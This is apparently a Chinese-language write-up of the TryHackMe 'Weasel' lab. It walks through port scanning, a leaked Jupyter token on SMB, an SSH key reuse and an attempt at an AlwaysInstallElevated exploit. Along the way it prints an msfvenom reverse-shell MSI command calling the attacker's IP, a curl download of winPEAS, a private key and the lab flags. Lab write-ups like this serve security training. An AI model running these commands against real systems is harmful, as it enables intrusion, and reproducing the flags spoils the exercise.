1579 words
8 minutes
THM Weasel
Recon
- 47001 是架設靶機環境預設會開的 port ,不用管他
┌──(kali😺dkri3c1)-[~]
└─$ rustscan -a 10.10.70.52 -r 1-65535 --ulimit 5000 -- -sC -sV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports like it's my full-time job. Wait, it is.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.70.52:22
Open 10.10.70.52:135
Open 10.10.70.52:139
Open 10.10.70.52:445
Open 10.10.70.52:5985
Open 10.10.70.52:8888
Open 10.10.70.52:47001
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV -Pn" on ip 10.10.70.52
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-26 09:18 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:18
Completed Parallel DNS resolution of 1 host. at 09:18, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:18
Scanning 10.10.70.52 [7 ports]
Discovered open port 5985/tcp on 10.10.70.52
Discovered open port 8888/tcp on 10.10.70.52
Discovered open port 139/tcp on 10.10.70.52
Discovered open port 22/tcp on 10.10.70.52
Discovered open port 445/tcp on 10.10.70.52
Discovered open port 135/tcp on 10.10.70.52
Discovered open port 47001/tcp on 10.10.70.52
Completed SYN Stealth Scan at 09:18, 0.33s elapsed (7 total ports)
Initiating Service scan at 09:18
Scanning 7 services on 10.10.70.52
Completed Service scan at 09:18, 23.38s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.70.52.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 11.95s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 1.30s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
Nmap scan report for 10.10.70.52
Host is up, received user-set (0.29s latency).
Scanned at 2025-07-26 09:18:21 EDT for 37s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 124 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 2b:17:d8:8a:1e:8c:99:bc:5b:f5:3d:0a:5e:ff:5e:5e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBae1NsdsMcZJNQQ2wjF2sxXK2ZF3c7qqW3TN/q91pWiDee3nghS1J1FZrUXaEj0wnAAAbYRg5vbRZRP9oEagBwfWG3QJ9AO6s5UC+iTjX+YKH6phKNmsY5N/LKY4+2EDcwa5R4uznAC/2Cy5EG6s7izvABLcRh3h/w4rVHduiwrueAZF9UjzlHBOxHDOPPVtg+0dniGhcXRuEU5FYRA8/IPL8P97djscu23btk/hH3iqdQWlC9b0CnOkD8kuyDybq9nFaebAxDW4XFj7KjCRuuu0dyn5Sr62FwRXO4wu08ePUEmJF1Gl3/fdYe3vj+iE2yewOFAhzbmFWEWtztjJb
| 256 3c:c0:fd:b5:c1:57:ab:75:ac:81:10:ae:e2:98:12:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOGl51l9Z4Mg4hFDcQz8v6XRlABMyVPWlkEXrJIg53piZhZ9WKYn0Gi4fKkzo3blDAsdqpGFQ11wwocBCSJGjQU=
| 256 e9:f0:30:be:e6:cf:ef:fe:2d:14:21:a0:ac:45:7b:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOHw9uTZkIMEgcZPW9Z28Mm+FX66+hkxk+8rOu7oI6J9
135/tcp open msrpc syn-ack ttl 124 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 124 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 124
5985/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8888/tcp open http syn-ack ttl 124 Tornado httpd 6.0.3
|_http-favicon: Unknown favicon MD5: 97C6417ED01BDC0AE3EF32AE4894FD03
| http-title: Jupyter Notebook
|_Requested resource was /login?next=%2Ftree%3F
| http-methods:
|_ Supported Methods: GET
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: TornadoServer/6.0.3
47001/tcp open http syn-ack ttl 124 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-26T13:18:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 34816/tcp): CLEAN (Couldn't connect)
| Check 2 (port 21907/tcp): CLEAN (Couldn't connect)
| Check 3 (port 22310/udp): CLEAN (Failed to receive data)
| Check 4 (port 22306/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:18
Completed NSE at 09:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds
Raw packets sent: 7 (308B) | Rcvd: 7 (308B)
Exploit
他有開 445 port,對應到 samba ,用 smbclient 列列看有哪些目錄
之後去讀 datasci-team 這個資料夾裡面的東西,然後一個一個把它 get 下來
在 misc 這個資料夾找到 jupyter-token.txt
┌──(kali㉿kali)-[~/thm]
└─$ smbclient //10.10.10.36/datasci-team
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 25 11:27:02 2022
.. D 0 Thu Aug 25 11:27:02 2022
.ipynb_checkpoints DA 0 Thu Aug 25 11:26:47 2022
Long-Tailed_Weasel_Range_-_CWHR_M157_[ds1940].csv A 146 Thu Aug 25 11:26:46 2022
misc DA 0 Thu Aug 25 11:26:47 2022
MPE63-3_745-757.pdf A 414804 Thu Aug 25 11:26:46 2022
papers DA 0 Thu Aug 25 11:26:47 2022
pics DA 0 Thu Aug 25 11:26:47 2022
requirements.txt A 12 Thu Aug 25 11:26:46 2022
weasel.ipynb A 4308 Thu Aug 25 11:26:46 2022
weasel.txt A 51 Thu Aug 25 11:26:46 2022
15587583 blocks of size 4096. 8918797 blocks available
smb: \> cd misc
smb: \misc\> ls
. DA 0 Thu Aug 25 11:26:47 2022
.. DA 0 Thu Aug 25 11:26:47 2022
jupyter-token.txt A 52 Thu Aug 25 11:26:47 2022
15587583 blocks of size 4096. 8926011 blocks available
smb: \misc\>
┌──(kali㉿kali)-[~/thm]
└─$ cat jupyter-token.txt
067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a
連上去他的 jupyter 的網頁,在 port 8888
把 token 拿過去用,就可以可以進入後台了
067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a
在他右上角有一個選項可以選擇 terminal
進去先 uname -a,得知是 wsl
Linux DEV-DATASCI-JUP 4.4.0-17763-Microsoft #2268-Microsoft Thu Oct 07 16:36:00 PST 2021 x86_64 x86_64 x86_64 GNU/Linux
在終端機找到 ssh private key
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBUoe5ZSezzC65UZhWt4dbvxKor+dNggEhudzK+JSs+YwAAAKjQ358n0N+f
JwAAAAtzc2gtZWQyNTUxOQAAACBUoe5ZSezzC65UZhWt4dbvxKor+dNggEhudzK+JSs+Yw
AAAED9OhQumFOiC3a05K+X6h22gQga0sQzmISvJJ2YYfKZWVSh7llJ7PMLrlRmFa3h1u/E
qiv502CASG53Mr4lKz5jAAAAI2Rldi1kYXRhc2NpLWxvd3ByaXZAREVWLURBVEFTQ0ktSl
VQAQI=
發現他不給連
┌──(kali㉿kali)-[/usr/share/peass/linpeas]
└─$ sudo ssh -i id_rsa dev-datasci@10.10.252.243
[sudo] password for kali:
Warning: Identity file id_rsa not accessible: No such file or directory.
dev-datasci@10.10.252.243: Permission denied (publickey,keyboard-interactive).
sudo -l 但是那個目錄沒有指令
在 /home/dev-datasci/.local/share/jupyter 找到 notebook_secret 看起來也沒用
這邊有個想法 , 就是把 jupyter 直接寫成 /bin/sh
提權成功 , 看起來是兔子洞
root@DEV-DATASCI-JUP:/var# uname -a
Linux DEV-DATASCI-JUP 4.4.0-17763-Microsoft #2268-Microsoft Thu Oct 07 16:36:00 PST 2021 x86_64 x86_64 x86_64 GNU/Linux
回頭思考解題流程,發現私鑰的使用方式可能有誤,私鑰的型式: <userid>_id_ed????,所以我們在使用 ssh 時候使用者名稱錯了,真正的使用者是dev-datasci-lowpriv
這邊還有踩一個坑就是 private key 如果權限開太大會用不了
連上去可以直接打 powershell 進 powershell
dev-datasci-lowpriv@DEV-DATASCI-JUP C:\Users\dev-datasci-lowpriv>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\dev-datasci-lowpriv>
Get user Flag: THM{w3as3ls_@nd_pyth0ns}
接下來研究提權利用 python3 server 去傳 winPeas
架起來
┌──(kali㉿kali)-[/usr/share/peass/winpeas]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.17.9.114 - - [28/Jul/2025 21:28:45] "GET / HTTP/1.1" 200 -
10.17.9.114 - - [28/Jul/2025 21:28:45] code 404, message File not found
10.17.9.114 - - [28/Jul/2025 21:28:45] "GET /favicon.ico HTTP/1.1" 404 -
10.10.16.42 - - [28/Jul/2025 21:29:12] "GET /winPEASx64.exe HTTP/1.1" 200 -
在受害機器上下載
PS C:\Users\dev-datasci-lowpriv\Desktop> curl 10.17.9.114/winPEASx64.exe -o winp
eas.exe
PS C:\Users\dev-datasci-lowpriv\Desktop> ls
Directory: C:\Users\dev-datasci-lowpriv\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/25/2022 5:21 AM 28916488 python-3.10.6-amd64.exe
-a---- 8/25/2022 7:40 AM 27 user.txt
-a---- 7/28/2025 6:29 PM 10144256 winpeas.exe
winPeas 上傳之後
+----------¦ Checking AlwaysInstallElevated
+ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/i
ndex.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
發現 HKLM 跟 HCKU 都是 0x1 ,所以我們可以上傳 msi 的安裝檔試試看
製作安裝檔:
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.9.114 LPORT=6969 -f msi -o exp.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: exp.msi
把環境架起來
在 local 端監聽
nc -lvnp 6969
然後在受害者那邊
msiexec /quite /qn /i <filename>
結果就失敗了
回想起前面的流程,懷疑可以將 Windows 的 C 槽整個掛載到 Linux 上,參考這篇
https://www.scivision.dev/mount-usb-drives-windows-subsystem-for-linux/
mount -t drvfs 'c:' /mnt/c
掛載完之後就可以 Get Root
Get Root Flag: THM{evelated_w3as3l_l0ngest_boi}
Pwned!
